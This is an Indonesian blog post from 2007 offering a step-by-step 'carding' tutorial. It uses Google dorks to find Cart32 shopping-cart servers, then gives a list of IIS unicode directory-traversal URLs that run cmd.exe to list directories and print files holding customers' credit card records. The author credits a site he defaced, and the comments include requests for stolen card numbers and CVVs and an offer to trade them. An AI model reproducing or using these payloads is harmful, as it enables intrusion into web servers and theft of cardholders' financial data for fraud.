Tutorial Carding (Bagian II)

 Sabtu 12 Mei 2007

Hola,,

artikel ini saya masukan sebagai lanjutan dari artikel sebelumnya tentang topik yang sama. Apabila ada yang tidak dimengerti tinggalkan pesan pada kolom comment dibawah ok GBU🙂

Tutorial Carding (Bagian II)

    

  

————————————–

Tutorial ini spyro dapatkan dari suatu ftp seorang korban saat sedang mendeface webnya (lihat posting berjudul “Mengapa aku mendeface profil FS dan website Fun2Holic” (19 september 2006) di halaman Cerita hari ini.

————————————–

1. Sama seperti diatas, Cari target dahulu di google.com dgn keyword allinurl:/cart32.exe/
2. Misalkan kita mendapat target dg url:

 http://www.contoh.com/scripts/cart32.exe/blablabla , maka:

3. Ganti url tsb menjadi -> http://www.contoh.com/scripts/
4. Modifikasi url tsb dg memasukkan unicode dibelakangnya -> http://www.contoh.com/scripts/<unicode&gt;
5. Contoh unicode utk path /scripts/ : –>
/scripts/%c1%9c/winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c/winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c+dir+c:\
Sedangkan utk path /cgi-bin/ ->
/cgi-bin/..\..\..\..\..\..\winnt\system32\cmd.exe?/c+dir+c:\
/cgi-bin/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c/winnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c+dir+c:\
6. Sebagai contoh, pada url diatas menggunakan path /scripts/ maka diubah menjadi http://www.contoh.com/scripts/%c1%9c/winnt/system32/cmd.exe?/c+dir+c:\
7. string diakhir unicode dg keterangan dir+c:\ maksudnya kita sedang berada dan melist directory c server target!
8. Untuk masuk ke directory cc’s ganti perintahnya unicode dgn -> http://www.contoh.com/scripts/%c1%9c/winnt/system32/cmd.exe?/c+dir+c:\progra~1\mwainc\cart32\
9. Kita akan output list dari file .32 sebagai contoh namanya WRBURNS-001065.c32
10. Nah.., utk melihat filenya dg unicode http://www.contoh.com/scripts/%c1%9c/winnt/system32/cmd.exe?/c+type+c:\progra~1\mwainc\cart32\WRBURNS-001065.c32
11. Kalo tidak berhasil, kita masih bisa mencobanya dengan unicode yg laennya.
12. Ok, semoga berhasil, materi ke-2 Selesai.

 

/* ——————————|EOF|—————————— */

sumber: spyrozone.net

About sugoistanley

Me is just another ordinary boy in this world....Iam not a hacker but i believe someday I Will...

Posted on May 13, 2007, in Hacking. Bookmark the permalink. 4 Comments.

  1. bagi cvv nya dong….

  2. ni gw tak tak kasih cc tp ntu cc sebagian bsr semua dah kepk n dah g virgin lage…klo mo pgn yg msh virgin bs hub aku dii bl4CKjUn1@gmail.com

  3. rastaman_live_up

    ko gw dah cba2 tutor yg diatas tp ga bsa2,tolong donk bantu,oh ya klo bleh gw mnta no cc ma nama&alamatnya…please banget…

  4. do you have english translation

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s